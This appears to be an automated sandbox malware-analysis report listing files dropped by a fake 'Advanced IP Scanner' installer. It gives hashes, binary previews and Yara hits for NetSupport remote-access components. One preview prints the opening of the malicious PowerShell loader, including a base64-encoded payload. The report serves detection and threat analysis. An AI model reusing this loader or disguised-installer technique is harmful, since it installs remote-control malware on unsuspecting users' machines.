                                                                                                                                                                                                  MD5:BA337B8D1BC9F117F7605A2B79B10064
                                                                                                                                                                                                  SHA1:9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
                                                                                                                                                                                                  SHA-256:EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
                                                                                                                                                                                                  SHA-512:277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):900288
                                                                                                                                                                                                  Entropy (8bit):6.823623458577979
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
                                                                                                                                                                                                  MD5:3E0303F978818E5C944F5485792696FD
                                                                                                                                                                                                  SHA1:3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
                                                                                                                                                                                                  SHA-256:7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
                                                                                                                                                                                                  SHA-512:C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\unins000.dat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:InnoSetup Log Network Utility Pro {AABBCCD1-22D3-4EF4-88FF-123456789ABC}, version 0x418, 6118449 bytes, 305090\37\user\376, C:\Program Files (x86)\Advanced IP Scanner
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6118449
                                                                                                                                                                                                  Entropy (8bit):4.024243879327782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:/hxs6jtR/RneZS1MvZmD33rSueTNJx5q1d2AMVyeTH:S
                                                                                                                                                                                                  MD5:7C0A8944C92990F3A11181DC463A7AD0
                                                                                                                                                                                                  SHA1:75EE5EDB0FD9602649E32FA24364EEACEF09C54E
                                                                                                                                                                                                  SHA-256:FDBB8509C707270C7771658C5A3B8F9A38159310F2330CE68C3EBA9FC968914D
                                                                                                                                                                                                  SHA-512:39DE28F4DD1759AE02CA45B5EBE852592B9CF041AECBFA4493DF0F3CF1F7012A14911C9C27372478003485E74ADC3C0C7D7FEA4759B5D10DC0B9A2A36F75E7CF
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, Author: Joe Security
                                                                                                                                                                                                  Preview:Inno Setup Uninstall Log (b)....................................{AABBCCD1-22D3-4EF4-88FF-123456789ABC}}.........................................................................................Network Utility Pro.....................................................................................................................1\].................................................................................................................6.............'...............3.0.5.0.9.0......j.o.n.e.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r....................... .......\..>T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3329597
                                                                                                                                                                                                  Entropy (8bit):6.563278634392228
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334Pi:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334a
                                                                                                                                                                                                  MD5:CB7E324B491A203424BDF73E30AFD225
                                                                                                                                                                                                  SHA1:03D9E2D82301C50932B002F2D9493B6B67D14E77
                                                                                                                                                                                                  SHA-256:579605F32ECDFDC505D5B5D55E77E1E94D73688FE1A7A51C950166A3E13240DB
                                                                                                                                                                                                  SHA-512:283D735F448FDB0A6BC2D0D3CF6E2ACAACFC3E2FECD244609963B586AC53CC69A05AE7A7BCA14A19416FF4E7B0FC5744266F6715F665A1A8EF0BEA292D4EF3B8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                  C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):80128
                                                                                                                                                                                                  Entropy (8bit):6.906674531653877
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                                                                                                                                                                                  MD5:1B171F9A428C44ACF85F89989007C328
                                                                                                                                                                                                  SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                                                                                                                                                                                  SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                                                                                                                                                                                  SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Network Tools\Advanced IP Scanner for Windows.lnk

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Fri Nov 8 17:02:14 2024, mtime=Fri Nov 8 17:02:14 2024, atime=Fri Apr 29 18:13:52 2022, length=1681960, window=hide
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1358
                                                                                                                                                                                                  Entropy (8bit):4.59591959254946
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:8mdB/n6E/dOEttaGZ6EIUn4Ak8/aoT5dcaGTUnKxdcaG7jaGOalUUP4ReqyFm:8mdB/nt/dOsaw6EIKfTCydcaqKKdca6z
                                                                                                                                                                                                  MD5:4693DA39EBBA9706A4646E52038FAE75
                                                                                                                                                                                                  SHA1:A4F4B3E76996A7893C83373CECFA3CB322C42333
                                                                                                                                                                                                  SHA-256:077FA672958085B05454D13DBD640ECDBC0E7D67633E4C9EE93C4AB4126C374A
                                                                                                                                                                                                  SHA-512:B35E05B438E3D5866FAC8B2F4DA03614340B5A76C74513FB4B3CD90AF066C3C0393BAE16EF6909E8BEAC14FA394E1DDFE40AB83A22BC0DD5F319408C9BD440F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:L..................F.... ....5.W.2....W.2....7C.[..(............................P.O. .:i.....+00.../C:\.....................1.....hY;...PROGRA~2.........O.IhY;.....................V.......P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....p.1.....hYJ...ADVANC~1..X......hYH.hYJ............................]R.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.....|.2.(....T.. .ADVANC~1.EXE..`......hYH.hYH.....8.........................a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.......q...............-.......p............!.......C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe..Q.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.a.d.v.a.n.c.e.d._.i.p._.s.c.a.n.n.e.r...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.?.%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r.\.A.d.v.a.n.c.e.d._.I.P._.S.c.a.n.n.e.r...i.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1772
                                                                                                                                                                                                  Entropy (8bit):5.46726758807131
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:QT1WSU4xympjms4RIoU99tlNWR831NTxZ9001dqZ0:QZLHxvMsIfAXW8n/S01YZ0
                                                                                                                                                                                                  MD5:242F41941249D5E3B32D299B6F43DE09
                                                                                                                                                                                                  SHA1:C82D602B69043F5B591CA09FD27DB8979465B21E
                                                                                                                                                                                                  SHA-256:AC920A14DBC371D7AC591BBD2A29149DCF59ACB407191098FC82F6470AEBB326
                                                                                                                                                                                                  SHA-512:A14B6CFFC3CF5B2403DA89D8B6742EEE003994B2E36FF4C7E10CA5DD9985A7144D6C4E47E000DC7F9C69FC4DE399C50F751327CA452247C40BB4AF61F1CEAF6B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:@...e...........S....................................@..........P................1]...E.....'.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnsqjgeu.qyy.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnnajrob.chy.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rfz5ppnk.mpg.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpeubnef.bql.psm1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65339), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3035738
                                                                                                                                                                                                  Entropy (8bit):5.999270311192215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:2e6uUAecyy1q8n4RkErBHwnnDkKKr9r6riooJc98haMi:j
                                                                                                                                                                                                  MD5:E7DB56615C92704E45D5832F1EB94C65
                                                                                                                                                                                                  SHA1:4D36D413E1B76D76A2E0420C70A093BBE460A209
                                                                                                                                                                                                  SHA-256:7E80DDE6044A5AE063E01D834953DEA9EBF6F83F8AE43B2F407EAFC17D6B33C6
                                                                                                                                                                                                  SHA-512:41D807E82D3987FD73107C4CB9A15B5B6992E2FC8F2064D5ED39B88820769EE9236B1D053B419723F89DFA4A0B6EA4D1B6F37AA2334D1542201FF7FB0A6E05A4
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1, Author: Joe Security
                                                                                                                                                                                                  Preview:$ErrorActionPreference = "Stop";..Set-Location $Env:AppData;..$installPath = "$Env:AppData\SystemUtil";..if (Test-Path $installPath) {.. Remove-Item "$Env:AppData\tempDataFile.txt";.. Exit;..};..$encodedData = "UEsDBBQACAAIAPAw5zYAAAAAAAAAAEgBAAAMACAAbnNrYmZsdHIuaW5mVVQNAAd0A49GGaUPZ3QDj0Z1eAsAAQQAAAAABAAAAABVj8GKwkAMhu8D8w5BPG4LHjxJTyu9KEVo2R6WRaZORoPjDGRGi2+/01oLhhxCkv//kg24cO2MjZyTM1JsUkJVww6fnVesoSQbkYfuNGwuFCDtgiGLqQhRWRsgXhDabQklqxv2nq/QkVNMGKSQ4vcHOZB3f1LUdHYq3hmLxbIlp30foGqWCykO7B+kkYuq3g+iFzDLsvlG+PYTEPmNVjH5QjbGqBh581dVk7faJO7upk2N/KATQjE7fs3Vsdcm4Cl+yN/NSb+njhU/p2eSzSpfD/tS/ANQSwcI96jtkdUAAABIAQAAUEsDBBQACAAIAI4MBVcAAAAAAAAAAAMBAAAHACAATlNNLkxJQ1VUDQAHbH3NZGx9zWRsfc1kdXgLAAEEAAAAAAQAAAAALY/RTkIxDIbvm+wd9gLKtoMKml0Chig3xAtDyMkcJSzObukGHt7eM7W9+r82X1NtlBKgBofu44h3XoCAJ7nBuj3nnLjKl+CRCspliHjbZiskZFfxIBNJ3T3qe3kj9Xyi5hOj9EMTtN7tFnRM7HG//439v2hMPlHlFPtE8WrH6zjkwFcrIJDzNVywwfi3jna1fF6v39+mnYAvN5ToLlisVq0EpGKsFpA5Hc6+jlhAQQ4u9pTsZvs668zUzEZ44kCf/Te73OSVHZX2nlUCfgBQSwcIFelrJc4AAAA

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6144
                                                                                                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\KC0uZWwr8p.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3305472
                                                                                                                                                                                                  Entropy (8bit):6.576592205223059
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:IdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334Py:6JYVM+LtVt3P/KuG2ONG9iqLRQu3334K
                                                                                                                                                                                                  MD5:77264DBCB409DE0C426BD5088B0FBE09
                                                                                                                                                                                                  SHA1:11C02946EA15EEA615EDE3ED5597ED223D3879CF
                                                                                                                                                                                                  SHA-256:85C71BB847F0B29DB1D790C631D586167942FFCEAE96605F5673438FE3C8DD1A
                                                                                                                                                                                                  SHA-512:5604A2FEE723CEA3238ACA10DD44E1B1A4D5316A1E2C860619E34B9076FEE501E9A9FC22C7E3E3DAD1FDC7690F1992A57778B74B40FE6F3307085549CCFC6A83
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):93560
                                                                                                                                                                                                  Entropy (8bit):6.5461580255883876
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:wrOxDJs/Ksdl0R1dBmhFXxRpP9JNvbnPUGI:3yXlQmhhHp9J9bnPTI
                                                                                                                                                                                                  MD5:4182F37B9BA1FA315268C669B5335DDE
                                                                                                                                                                                                  SHA1:2C13DA0C10638A5200FED99DCDCF0DC77A599073
                                                                                                                                                                                                  SHA-256:A74612AE5234D1A8F1263545400668097F9EB6A01DFB8037BC61CA9CAE82C5B8
                                                                                                                                                                                                  SHA-512:4F22AD5679A844F6ED248BF2594AF94CF2ED1E5C6C5441F0FB4DE766648C17D1641A6CE7C816751F0520A3AE336479C15F3F8B6EBE64A76C38BC28A02FF0F5DC
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\AudioCapture.dll, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..in.:n.:n.:g.6:|.:g. :".:g.':J.:g.0:i.:n.:5.:g.):i.:g.1:o.:p.7:o.:g.2:o.:Richn.:........PE..L......U...........!.........j.......S............0.................................5f..............................@*..-...."..P....P..X............D..x)...`..4...p...................................@...............@............................text............................... ..`.rdata..m;.......<..................@..@.data........0......................@....rsrc...X....P.......$..............@..@.reloc..T....`.......,..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328056
                                                                                                                                                                                                  Entropy (8bit):6.754723001562745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:2ib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OK/Y:2ib5YbsXioEgULFpSzya9/lY5SilQCfg
                                                                                                                                                                                                  MD5:2D3B207C8A48148296156E5725426C7F
                                                                                                                                                                                                  SHA1:AD464EB7CF5C19C8A443AB5B590440B32DBC618F
                                                                                                                                                                                                  SHA-256:EDFE2B923BFB5D1088DE1611401F5C35ECE91581E71503A5631647AC51F7D796
                                                                                                                                                                                                  SHA-512:55C791705993B83C9B26A8DBD545D7E149C42EE358ECECE638128EE271E85B4FDBFD6FBAE61D13533BF39AE752144E2CC2C5EDCDA955F18C37A785084DB0860C
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\HTCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......=G....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\SystemUtil\NSM.LIC

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):259
                                                                                                                                                                                                  Entropy (8bit):5.103526864179364
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:O/oPzQyak4xRPjwxXTkoaydDKHMoEEjLgpW2Mch6IXZNWYpPM/ioUBENLa8l6i7s:XbQyaZR7wxooT8JjjqW2Ma6aNBPM/ioc
                                                                                                                                                                                                  MD5:866C96BA2823AC5FE70130DFAAA08531
